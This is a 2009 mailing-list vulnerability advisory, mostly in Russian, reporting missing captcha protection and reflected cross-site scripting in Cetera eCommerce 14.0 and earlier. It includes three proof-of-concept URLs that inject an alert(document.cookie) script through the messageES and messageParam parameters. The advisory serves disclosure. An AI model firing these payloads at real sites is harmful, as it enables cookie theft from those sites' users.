Related information

Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

XSS Vulnerability in JpGraph 3.0.6

Kayako SupportSuite version 3.60.04

From:	MustLive <mustlive_(at)_websecurity.com.ua>
Date:	23.12.2009
Subject:	Vulnerabilities in Cetera CMS

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною Insufficient Anti-automation и Cross-Site Scripting
уязвимостях в Cetera eCommerce.

Insufficient Anti-automation:

http://site/

http://site/account/

На данных страницах отсутствует защита от автоматизированных запросов (капча).

XSS:

http:
//site/account/?messageES=s9&messageParam[0]=%3Cscript%3Ealert(do
cument.cookie)%3C/script%3E

http://site/cms/index.
php?messageES=%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E

http://site/cms/index.
php?messageES=s9&messageParam[0]=%3Cscript%3Ealert(document.
cookie)%3C/script%3E

Уязвимы Cetera eCommerce 14.0 и предыдущие версии.

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/3640/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua